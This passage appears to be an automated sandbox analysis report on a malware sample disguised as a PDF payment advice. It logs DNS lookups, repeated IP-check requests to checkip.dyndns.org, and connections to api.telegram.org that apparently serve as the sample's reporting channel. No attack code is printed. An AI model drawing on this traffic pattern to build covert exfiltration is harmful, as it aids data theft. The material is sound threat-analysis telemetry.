                                                                                                              Dec 19, 2024 15:29:57.741750956 CET44349899149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:58.386661053 CET44349899149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:58.386760950 CET44349899149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:58.386811972 CET49899443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:58.387341022 CET49899443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:58.390372992 CET4989580192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:58.391381979 CET4990580192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:58.510598898 CET8049895193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:58.510689974 CET4989580192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:58.511270046 CET8049905193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:58.511354923 CET4990580192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:58.511513948 CET4990580192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:58.631036043 CET8049905193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:00.399445057 CET8049905193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:00.400696993 CET49911443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:00.400799990 CET44349911149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:00.400881052 CET49911443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:00.401190996 CET49911443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:00.401230097 CET44349911149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:00.453327894 CET4990580192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:01.799906969 CET44349911149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:01.801517963 CET49911443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:01.801549911 CET44349911149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:01.801615000 CET49911443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:01.801625967 CET44349911149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:02.640518904 CET44349911149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:02.642007113 CET44349911149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:02.642081976 CET49911443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:02.673069954 CET49911443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:02.750102043 CET4990580192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:02.796205044 CET4991780192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:02.870014906 CET8049905193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:02.870089054 CET4990580192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:02.916043043 CET8049917193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:02.916126966 CET4991780192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:02.917160034 CET4991780192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:03.036664009 CET8049917193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:07.227844000 CET8049917193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:07.232034922 CET49928443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:07.232122898 CET44349928149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:07.232218027 CET49928443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:07.232530117 CET49928443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:07.232562065 CET44349928149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:07.281519890 CET4991780192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:08.596633911 CET44349928149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:08.599138975 CET49928443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:08.599160910 CET44349928149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:08.599201918 CET49928443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:08.599212885 CET44349928149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:09.283654928 CET44349928149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:09.283735037 CET44349928149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:09.283777952 CET49928443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:09.284161091 CET49928443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:09.288836002 CET4991780192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:09.290319920 CET4993480192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:09.408832073 CET8049917193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:09.408953905 CET4991780192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:09.409900904 CET8049934193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:09.409982920 CET4993480192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:09.410159111 CET4993480192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:09.529779911 CET8049934193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:11.925851107 CET8049761193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:11.926085949 CET4976180192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:13.822424889 CET8049934193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:30:13.823016882 CET49945443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:13.823056936 CET44349945149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:13.823137999 CET49945443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:13.823385000 CET49945443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:30:13.823394060 CET44349945149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:13.875391960 CET4993480192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:30:15.184931040 CET44349945149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:30:15.234741926 CET49945443192.168.2.4149.154.167.220
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 19, 2024 15:28:43.310990095 CET5724953192.168.2.41.1.1.1
                                                                                                              Dec 19, 2024 15:28:43.448050976 CET53572491.1.1.1192.168.2.4
                                                                                                              Dec 19, 2024 15:28:46.132462978 CET5004553192.168.2.41.1.1.1
                                                                                                              Dec 19, 2024 15:28:46.270205975 CET53500451.1.1.1192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.903795958 CET5977253192.168.2.41.1.1.1
                                                                                                              Dec 19, 2024 15:28:53.043029070 CET53597721.1.1.1192.168.2.4
                                                                                                              Dec 19, 2024 15:28:55.147900105 CET5568153192.168.2.41.1.1.1
                                                                                                              Dec 19, 2024 15:28:55.598881960 CET53556811.1.1.1192.168.2.4
                                                                                                              Dec 19, 2024 15:29:03.095367908 CET4991553192.168.2.41.1.1.1
                                                                                                              Dec 19, 2024 15:29:03.232485056 CET53499151.1.1.1192.168.2.4
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 19, 2024 15:28:43.310990095 CET192.168.2.41.1.1.10xbcdeStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:46.132462978 CET192.168.2.41.1.1.10x20a7Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:52.903795958 CET192.168.2.41.1.1.10x7c72Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:55.147900105 CET192.168.2.41.1.1.10xc4cbStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:29:03.095367908 CET192.168.2.41.1.1.10x11e2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 19, 2024 15:28:43.448050976 CET1.1.1.1192.168.2.40xbcdeNo error (0)drive.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:46.270205975 CET1.1.1.1192.168.2.40x20a7No error (0)drive.usercontent.google.com172.217.17.65A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:53.043029070 CET1.1.1.1192.168.2.40x7c72No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:53.043029070 CET1.1.1.1192.168.2.40x7c72No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:53.043029070 CET1.1.1.1192.168.2.40x7c72No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:53.043029070 CET1.1.1.1192.168.2.40x7c72No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:53.043029070 CET1.1.1.1192.168.2.40x7c72No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:53.043029070 CET1.1.1.1192.168.2.40x7c72No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:55.598881960 CET1.1.1.1192.168.2.40xc4cbNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:28:55.598881960 CET1.1.1.1192.168.2.40xc4cbNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                              Dec 19, 2024 15:29:03.232485056 CET1.1.1.1192.168.2.40x11e2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              • drive.google.com
                                                                                                              • drive.usercontent.google.com
                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • checkip.dyndns.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449738193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:28:53.169971943 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:28:54.440159082 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:28:54 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: e73619d59b1ce4e6965b0ca321b92061
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Dec 19, 2024 15:28:54.462771893 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Dec 19, 2024 15:28:54.868684053 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:28:54 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 80be68382fff9e8969e6dc958fb7bd45
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Dec 19, 2024 15:29:02.683444977 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Dec 19, 2024 15:29:03.089947939 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:02 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: f07a40c634f6dc53dcf232710489a3d1
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.449761193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:05.638117075 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Dec 19, 2024 15:29:06.925045013 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:06 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: cd98585a875c5c274dbf008c48117cce
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.449769193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:09.109477997 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:10.400998116 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:10 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 0ce29205d141af88bac05c90e7ef571b
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.449781193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:12.681716919 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:13.951332092 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:13 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 1282db76e5441954a430e712812859dd
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.449789193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:16.120825052 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:17.390192986 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:17 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 59fbfe58a8c1f0617118c24eebbfb428
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.449800193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:19.513865948 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:20.788104057 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:20 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 294658bba994c3ae6e01dd951d082a2d
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.449810193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:22.958538055 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:24.227775097 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:24 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: cc25602d068e3d9f8dbb64d037a222f1
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.449818193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:26.480266094 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:27.748338938 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:27 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 1d829a01df01b753cfbd2a40eeaacc09
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.449828193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:30.018979073 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:31.745843887 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:31 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 1d1805b8dc23c9ea957b581906b343a1
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.449839193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:34.135602951 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:35.403703928 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:35 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: ddea179e0e41e3c1b2de1c31ac289c88
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.449847193.122.6.168807788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 19, 2024 15:29:37.649194002 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 19, 2024 15:29:38.917552948 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 19 Dec 2024 14:29:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
